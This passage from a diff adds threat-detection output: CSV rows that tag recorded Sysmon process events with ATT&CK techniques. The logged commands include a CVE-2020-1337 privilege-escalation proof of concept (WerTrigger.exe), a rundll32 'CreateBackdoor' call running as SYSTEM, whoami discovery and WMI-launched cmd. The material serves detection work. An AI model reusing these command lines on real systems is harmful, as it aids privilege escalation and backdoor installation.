+    <Data Name=""CurrentDirectory"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
+    <Data Name=""LogonId"">0x41c24</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-E938-5F33-0000-00109CA00E00</Data>
+    <Data Name=""ParentProcessId"">7820</Data>
+    <Data Name=""ParentImage"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe</Data>
+    <Data Name=""ParentCommandLine"">WerTrigger.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:48:17.044002Z"">
+    </TimeCreated>
+    <EventRecordID>344</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:48:16.990</Data>
+    <Data Name=""ProcessGuid"">747F3D96-2910-5E1E-0000-001053F57C00</Data>
+    <Data Name=""ProcessId"">4448</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe /c start ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-2910-5E1E-0000-002082EF7C00</Data>
+    <Data Name=""LogonId"">0x7cef82</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
+    <Data Name=""ParentProcessId"">4612</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:48:17.044002Z"">
+    </TimeCreated>
+    <EventRecordID>344</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:48:16.990</Data>
+    <Data Name=""ProcessGuid"">747F3D96-2910-5E1E-0000-001053F57C00</Data>
+    <Data Name=""ProcessId"">4448</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe /c start ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-2910-5E1E-0000-002082EF7C00</Data>
+    <Data Name=""LogonId"">0x7cef82</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
+    <Data Name=""ParentProcessId"">4612</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:48:17.044002Z"">
+    </TimeCreated>
+    <EventRecordID>344</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:48:16.990</Data>
+    <Data Name=""ProcessGuid"">747F3D96-2910-5E1E-0000-001053F57C00</Data>
+    <Data Name=""ProcessId"">4448</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd.exe /c start ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-2910-5E1E-0000-002082EF7C00</Data>
+    <Data Name=""LogonId"">0x7cef82</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
+    <Data Name=""ParentProcessId"">4612</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557970296.456891,2019-05-16T05:31:36.456891+04:00,,Threat,Low,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C ipconfig ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-16T01:31:36.454892Z"">
+    </TimeCreated>
+    <EventRecordID>17985</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1792"" ThreadID=""2232"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-16 01:31:36.443</Data>
+    <Data Name=""ProcessGuid"">DFAE8213-BD78-5CDC-0000-001091041300</Data>
+    <Data Name=""ProcessId"">3136</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.3.9600.16384 (winblue_rtm.130821-1623)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /C ipconfig</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\administrator\</Data>
+    <Data Name=""User"">insecurebank\Administrator</Data>
+    <Data Name=""LogonGuid"">DFAE8213-BD78-5CDC-0000-002005FE1200</Data>
+    <Data Name=""LogonId"">0x12fe05</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3</Data>
+    <Data Name=""ParentProcessGuid"">DFAE8213-BD78-5CDC-0000-0010C7FE1200</Data>
+    <Data Name=""ParentProcessId"">3948</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\winrshost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\WinrsHost.exe -Embedding</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( &quot;C:\Windows\system32\whoami.exe&quot;  /all) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-29T20:59:22.144046Z"">
+    </TimeCreated>
+    <EventRecordID>8050</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1896"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-29 20:59:22.128</Data>
+    <Data Name=""ProcessGuid"">365ABB72-65AA-5CC7-0000-00104D882400</Data>
+    <Data Name=""ProcessId"">2116</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;  /all</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Documents\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-5B3A-5CC7-0000-002096080100</Data>
+    <Data Name=""LogonId"">0x10896</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-65A9-5CC7-0000-00104E5C2400</Data>
+    <Data Name=""ParentProcessId"">3376</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot;  /all ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-29T20:59:22.144046Z"">
+    </TimeCreated>
+    <EventRecordID>8050</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1896"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-29 20:59:22.128</Data>
+    <Data Name=""ProcessGuid"">365ABB72-65AA-5CC7-0000-00104D882400</Data>
+    <Data Name=""ProcessId"">2116</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;  /all</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Documents\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-5B3A-5CC7-0000-002096080100</Data>
+    <Data Name=""LogonId"">0x10896</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-65A9-5CC7-0000-00104E5C2400</Data>
+    <Data Name=""ParentProcessId"">3376</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Command run remotely Using WMI,1603490254.745175,2020-10-24T01:57:34.745175+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:57:29.217562Z"">
+    </TimeCreated>
+    <EventRecordID>423991</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:57:29.192</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51C9-5F93-0000-001010175B00</Data>
+    <Data Name=""ProcessId"">8796</Data>
+    <Data Name=""Image"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">WMI Provider Host</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Wmiprvse.exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\NETWORK SERVICE</Data>
+    <Data Name=""LogonGuid"">747F3D96-C50A-5F93-0000-0020E4030000</Data>
+    <Data Name=""LogonId"">0x3e4</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">836</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.548464Z"">
+    </TimeCreated>
+    <EventRecordID>243565</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.544</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010729F2000</Data>
+    <Data Name=""ProcessId"">3536</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.548464Z"">
+    </TimeCreated>
+    <EventRecordID>243565</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.544</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010729F2000</Data>
+    <Data Name=""ProcessId"">3536</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237560.737148,2020-08-12T17:06:00.737148+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c reg query &quot;HKLM\Software\WOW6432Node\Npcap&quot; /ve 2&gt;nul | find &quot;REG_SZ&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-12T13:05:38.260138Z"">
+    </TimeCreated>
+    <EventRecordID>342409</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3344"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-08-12 13:05:38.149</Data>
+    <Data Name=""ProcessGuid"">747F3D96-E922-5F33-0000-00107A2B0B00</Data>
+    <Data Name=""ProcessId"">6952</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
